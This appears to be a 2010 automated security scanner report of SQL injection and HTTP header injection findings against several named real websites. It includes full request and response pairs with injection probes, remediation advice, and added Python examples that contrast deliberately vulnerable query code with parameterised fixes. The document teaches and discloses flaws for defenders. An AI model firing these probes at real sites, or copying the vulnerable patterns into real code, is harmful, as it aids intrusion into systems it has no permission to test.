SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
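The following Python script is a worked example added to this page (it is not code from any of the scanned sites, and the in-memory SQLite users table and its rows are constructed sample data). It demonstrates the three points made above in one place: a placeholder neutralises the ' or 1=1-- style probe that the findings below use, quote doubling leaves a numeric context injectable, and a value escaped on insertion re-enters a later query unescaped (second-order injection).

```python
import sqlite3

# Constructed sample data for the demonstration (not from any scanned site).
SAMPLE_USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]


def make_db():
    """In-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_quotes(value):
    """The 'double up single quotes' defense discussed above."""
    return value.replace("'", "''")


# 1. String context: concatenation is injectable, a placeholder is not.

def find_by_name_concat(conn, name):
    # Vulnerable: the input is pasted into the SQL text.
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_by_name_param(conn, name):
    # Parameterised: query structure is fixed first, the value is bound second.
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


# 2. Numeric context: quote doubling does nothing because there are no quotes to close.

def find_by_id_escaped(conn, user_id):
    # Still vulnerable: escape_quotes() leaves "1 or 1=1" untouched.
    sql = "SELECT id, name FROM users WHERE id = " + escape_quotes(user_id)
    return conn.execute(sql).fetchall()


def find_by_id_param(conn, user_id):
    # Parameterised: the whole string is compared as one value, so the probe matches nothing.
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


# 3. Second-order: data escaped on the way in comes back out unescaped.

def register_escaped(conn, name, email):
    # The insert itself is "safe": the doubled quote is stored as a single quote.
    cur = conn.execute(
        "INSERT INTO users (name, email) VALUES ('%s', '%s')"
        % (escape_quotes(name), escape_quotes(email))
    )
    return cur.lastrowid


def emails_for_user_concat(conn, user_id):
    # Reads the stored name back and reuses it in a concatenated query: vulnerable.
    (name,) = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT id, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def emails_for_user_param(conn, user_id):
    # Same logic with a placeholder: the stored quote is just data.
    (name,) = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return conn.execute("SELECT id, email FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' or 1=1--"                      # same shape as the 1=1 probes in the findings below
    print(find_by_name_concat(db, probe))      # every row: the WHERE clause was rewritten
    print(find_by_name_param(db, probe))       # []: compared literally, no user has that name
    print(find_by_id_escaped(db, "1 or 1=1"))  # every row: nothing for escape_quotes() to escape
    print(find_by_id_param(db, "1 or 1=1"))    # []
    new_id = register_escaped(db, "eve' or 1=1--", "eve@example.com")
    print(emails_for_user_concat(db, new_id))  # every row: the stored quote re-enters the query
    print(emails_for_user_param(db, new_id))   # only eve's row
```

The numeric case is the one most often missed in code review: escape_quotes() is applied, so the code looks defended, yet the probe never needed a quote. The second-order case is why the text recommends parameterising every variable item, not just the ones that arrive directly from the request.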
The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11532009'%20or%201%3d1--%20 and 11532009'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /vacation-rentals/mexico+1+311532009'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/mexico+1+311532009'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 49493120'%20or%201%3d1--%20 and 49493120'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19013238'%20or%201%3d1--%20 and 19013238'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 97937254'%20or%201%3d1--%20 and 97937254'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 95733272'%20or%201%3d1--%20 and 95733272'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15259239'%20or%201%3d1--%20 and 15259239'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the two response excerpts shown below, the only visible differences are the Date header, the per-request cb and key_page values in the ad script URL, and the reflected referer value itself; none of these depends on whether 1=1 or 1=2 is true, so this finding should be treated as a likely false positive unless a manual test shows otherwise.
Request 1
GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Response 1 (redirected)
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//"> <html> <head> <title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title> <meta http-e ...[SNIP]... <script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771239&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771239&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d1--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>
</head> <body>
<script type="text/javascript"><!-- s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general"; s.campaign="";s.events="";s.products=""; var s_code=s.t();if(s_code)document.write(s_code); s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32; //--></script> <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/> </noscript>
Request 2
GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Response 2 (redirected)
HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//"> <html> <head> <title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title> <meta http-e ...[SNIP]... <script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771250&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771250&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d2--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>
</head> <body>
<script type="text/javascript"><!-- s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general"; s.campaign="";s.events="";s.products=""; var s_code=s.t();if(s_code)document.write(s_code); s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32; //--></script> <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/> </noscript>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
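An added example of the validation the paragraph describes, in Python (written for this page, not the redir.php application's own code): a check that rejects any character below 0x20, a short alphanumeric allow-list, and a small 302 builder that, with validation switched off, reproduces the header split seen in the responses below using the report's own payload 7276c%0d%0a96ecccdd8a. The target URL and the two-parameter query are a trimmed-down stand-in for the real redirect.

```python
import re
from urllib.parse import unquote

# Added example for this page; not code from the redir.php application.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")      # anything below 0x20, plus DEL
SHORT_TOKEN = re.compile(r"[A-Za-z0-9_.-]{1,64}")  # allow-list for values copied into a header


def contains_control_chars(value):
    """Minimum check from the text: reject any control character, CR and LF included."""
    return CONTROL_CHARS.search(value) is not None


def is_short_token(value):
    """Stricter check: only short alphanumeric strings may reach a header."""
    return SHORT_TOKEN.fullmatch(value) is not None


def build_redirect(target, params, validate):
    """Header lines of a 302 whose Location carries params as a query string.

    validate=False copies names and values raw, which is what the vulnerable
    endpoint does; validate=True rejects anything outside the allow-list first.
    """
    if validate:
        for name, value in params.items():
            if not (is_short_token(name) and is_short_token(value)):
                raise ValueError("rejected request parameter %r" % name)
    query = "&".join(name + "=" + value for name, value in params.items())
    return ["HTTP/1.1 302 Found", "Location: " + target + "?" + query, "Content-Length: 0"]


def wire_format(header_lines):
    """Serialise the headers as they would leave the server."""
    return "\r\n".join(header_lines) + "\r\n\r\n"


def parse_headers(raw):
    """Split a raw response the way a client does: one header per CRLF-terminated line."""
    head = raw.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")


# Constructed stand-in for the real redirect: one fixed parameter plus the tested one.
TARGET = "http://usfca.edu/bps/graduate/"


def demo(client_value, validate):
    params = {"utm_source": "google", "client": client_value}
    return parse_headers(wire_format(build_redirect(TARGET, params, validate)))


def rejected_by_validation(client_value):
    try:
        demo(client_value, validate=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = unquote("7276c%0d%0a96ecccdd8a")        # the report's payload, decoded as the server would
    for line in demo(payload, validate=False):        # "96ecccdd8a" comes out as a header line of its own
        print(repr(line))
    print(rejected_by_validation(payload))            # True: the value never reaches the Location header
    print(demo("ca-dp-godaddy2_xml", validate=True))  # the legitimate client value from the requests below
```

The allow-list is deliberately narrow and has to be chosen per parameter: utm_term=financial mba in the requests below contains a space and would be rejected as written. Percent-encoding the query string when building the Location value (urllib.parse.urlencode) would also neutralise the CR and LF, but the page's advice to validate on arrival is the primary control and should not be replaced by encoding alone.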
The value of the client request parameter is copied into the Location response header. The payload 7276c%0d%0a96ecccdd8a was submitted in the client parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=7276c%0d%0a96ecccdd8a HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:42 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=64ec9846-bb52-23a8-43c8-0000231d7fb3; expires=Sat, 12-Feb-2011 23:04:42 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=7276c
96ecccdd8a
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://111.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 463f8%0d%0a528a1642c1b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml&463f8%0d%0a528a1642c1b=1 HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:47 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4df582d6-538d-b488-33fe-0000429ab8cd; expires=Sat, 12-Feb-2011 23:04:47 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml&463f8
528a1642c1b=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload e669a%0d%0ae28ea9c05d9 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2Fe669a%0d%0ae28ea9c05d9&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:38 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=57f27a3d-d285-68a8-5328-0000395dd34d; expires=Sat, 12-Feb-2011 23:04:38 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/e669a
e28ea9c05d9?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the utm_campaign request parameter is copied into the Location response header. The payload 30b1f%0d%0aecfcd25a03f was submitted in the utm_campaign parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=30b1f%0d%0aecfcd25a03f&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:32 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=4c8b74bb-3954-8fa8-8326-0000577eace0; expires=Sat, 12-Feb-2011 23:04:32 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=30b1f
ecfcd25a03f&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the utm_medium request parameter is copied into the Location response header. The payload 82be3%0d%0ab09c9f27eec was submitted in the utm_medium parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=82be3%0d%0ab09c9f27eec&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=3cef34ad-6303-35a8-1b8f-00003fd62bad; expires=Sat, 12-Feb-2011 23:04:18 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=82be3
b09c9f27eec&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the utm_source request parameter is copied into the Location response header. The payload a9f0f%0d%0a3b6a61bb32f was submitted in the utm_source parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=a9f0f%0d%0a3b6a61bb32f&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:11 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6676e6cc-44e7-2308-1a57-00001c552986; expires=Sat, 12-Feb-2011 23:04:11 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=a9f0f
3b6a61bb32f&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=ca-dp-godaddy2_xml
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the utm_term request parameter is copied into the Location response header. The payload ca84c%0d%0aa3b87022440 was submitted in the utm_term parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=ca84c%0d%0aa3b87022440&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=ca-dp-godaddy2_xml HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:26 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=45f848c0-6f73-7f49-52f3-00006d9772ca; expires=Sat, 12-Feb-2011 23:04:26 GMT; path=/; domain=.xg4ken.com
